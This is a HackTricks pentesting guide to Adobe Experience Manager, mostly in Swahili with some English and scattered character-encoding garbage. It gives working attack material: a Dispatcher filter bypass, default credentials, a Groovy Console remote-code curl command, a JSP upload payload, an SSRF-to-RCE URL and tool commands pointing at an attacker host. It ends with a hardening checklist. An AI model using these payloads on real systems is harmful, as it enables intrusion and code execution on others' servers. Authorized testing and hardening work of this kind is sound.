AEM (Adobe Experience Manager) Pentesting
Reading time: 5 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Adobe Experience Manager (AEM, sehemu ya Adobe Experience Cloud) ni CMS ya biashara inayotumia Apache Sling/Felix (OSGi) na Java Content Repository (JCR). Kutoka kwa mtazamo wa mshambuliaji, mifano ya AEM mara nyingi huonyesha hatari za maendeleo, sheria dhaifu za Dispatcher, akreditivu za default na orodha ndefu ya CVEs ambazo zinarekebishwa kila robo mwaka.
Orodha ya ukaguzi hapa chini inazingatia uso wa shambulio unaoweza kufikiwa kwa nje (unauth) ambao unaendelea kuonekana katika ushirikiano halisi (2022-2025).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
/etc.clientlibs/
njia ya kudumu inapatikana (inarudisha JS/CSS)./libs/granite/core/content/login.html
ukurasa wa kuingia wenye bendera ya βAdobe Experience Managerβ.</script><!--/* CQ */-->
maoni chini ya HTML.
2. Mipaka ya juu ya thamani zisizo na uthibitisho
Path | Unachopata | Maelezo |
---|---|---|
/.json , /.1.json | JCR nodes kupitia DefaultGetServlet | Mara nyingi imezuiwa, lakini Dispatcher bypass (angalia chini) inafanya kazi. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Kuvuja kwa mti wa ukurasa, njia za ndani, majina ya watumiaji. |
/system/console/status-* , /system/console/bundles | OSGi/Felix console | 403 kwa kawaida; ikiwa imefunuliwa & sifa zimepatikana β bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Inaruhusu pakiti za maudhui zilizothibitishwa β kupakia mzigo wa JSP. |
/etc/groovyconsole/** | AEM Groovy Console | Ikiwa imefunuliwa β utekelezaji wa Groovy / Java bila mipaka. |
/libs/cq/AuditlogSearchServlet.json | Kumbukumbu za ukaguzi | Ufunuo wa taarifa. |
/libs/cq/ui/content/dumplibs.html | Mzigo wa ClientLibs | XSS vector. |
Njia ya kupita ya Dispatcher
Tovuti nyingi za uzalishaji ziko nyuma ya Dispatcher (reverse-proxy). Kanuni zake za filtrering zinaweza kupitishwa kwa kuongeza kiambishi cha kudumu baada ya alama ya semikolon au newline iliyosimbwa:
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. γγ
3. Makosa ya kawaida ya usanidi (bado yanaendelea mwaka 2025)
- Anonymous POST servlet β
POST /.json
with:operation=import
lets you plant new JCR nodes. Blocking*.json
POST in the Dispatcher fixes it. γγ - Profaili za watumiaji zinazoweza kusomwa na kila mtu β default ACL grants
jcr:read
on/home/users/**/profile/*
to everyone. - Akawali za default β
admin:admin
,author:author
,replication:replication
. - WCMDebugFilter enabled β reflected XSS via
?debug=layout
(CVE-2016-7882, still found on legacy 6.4 installs). - Groovy Console exposed β remote code execution by sending a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
4. Uthibitisho wa hivi karibuni (mzunguko wa huduma)
Quarter | CVE | Affected | Impact |
---|---|---|---|
Dec 2024 | CVE-2024-43711 | 6.5.21 and earlier | Improper input validation β Arbitrary code execution (requires low-priv auth). γγ |
Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. γγ |
Dec 2023 | CVE-2023-48452/68 | β€ 6.5.18 | DOM-based XSS via crafted URL. γγ |
Dec 2022 | CVE-2022-30683 | β€ 6.5.13 | Crypto design flaw β secret decryption (needs low-priv creds). γγ |
Always check the APSB bulletin matching the customerβs service-pack and request the latest 6.5.22 or Cloud Service 2024.11.
5. Vipande vya unyakuzi
5.1 RCE kupitia bypass ya dispatcher + upakuaji wa JSP
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Sasa omba /content/evil.jsp
β JSP inafanya kazi na mtumiaji wa mchakato wa AEM.
5.2 SSRF hadi RCE (historia < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py
kutoka aem-hacker inafanya mchakato mzima kiotomatiki. γγ
6. Zana
- aem-hacker β skripti ya kuorodhesha ya Swiss-army, inasaidia kupita dispatcher, kugundua SSRF, ukaguzi wa default-creds na zaidi.
python3 aem_hacker.py -u https://target --host attacker-ip
- Content Brute-force β omba kwa kurudiarudia
/_jcr_content.(json|html)
ili kugundua vipengele vilivyofichwa. - osgi-infect β pakia OSGi bundle hatari kupitia
/system/console/bundles
ikiwa akauti zinapatikana.
7. Orodha ya kuimarisha (kwa mapendekezo ya ripoti yako)
- Hifadhi mfano kwenye pakiti ya huduma ya hivi karibuni (kuanzia Julai 2025: 6.5.22).
- Ondoa/zungusha akaunti za default; tekeleza SSO/SAML.
- Imarisha Dispatcher filters β kataa
;
, mistari mipya iliyokodishwa, na*.json
au*.querybuilder.json
kwa watumiaji wasiojulikana. - Zima au linda consoles (
/system/console
,/crx/*
,/etc/groovyconsole
) kwa orodha za ruhusa za IP. - Tekeleza pakiti ya Anonymous Permission Hardening iliyotolewa na Adobe.
Marejeleo
- Adobe Security Bulletin APSB24-69 β βMaktaba za usalama kwa Adobe Experience Manager (Desemba 2024)β.
- 0ang3el β zana ya aem-hacker (GitHub).
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.